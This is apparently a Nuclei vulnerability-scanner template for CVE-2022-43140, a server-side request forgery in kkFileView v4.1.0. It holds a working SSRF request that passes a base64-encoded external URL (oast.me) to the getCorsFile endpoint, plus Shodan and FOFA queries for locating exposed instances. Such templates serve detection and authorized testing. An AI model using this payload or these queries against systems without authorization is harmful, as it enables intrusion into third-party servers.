32 lines
1.0 KiB
YAML
32 lines
1.0 KiB
YAML
id: CVE-2022-43140
|
|
|
|
info:
|
|
name: kkFileview v4.1.0 - Server Side Request Forgery
|
|
author: Co5mos
|
|
severity: high
|
|
description: |
|
|
kkFileView v4.1.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. This vulnerability allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the url parameter.
|
|
reference:
|
|
- https://github.com/kekingcn/kkFileView/issues/392
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-43140
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-43140
|
|
metadata:
|
|
verified: "true"
|
|
shodan-query: http.html:"kkFileView"
|
|
fofa-query: app="kkFileView"
|
|
tags: cve,cve2022,ssrf,kkFileview
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<h1> Interactsh Server </h1>"
|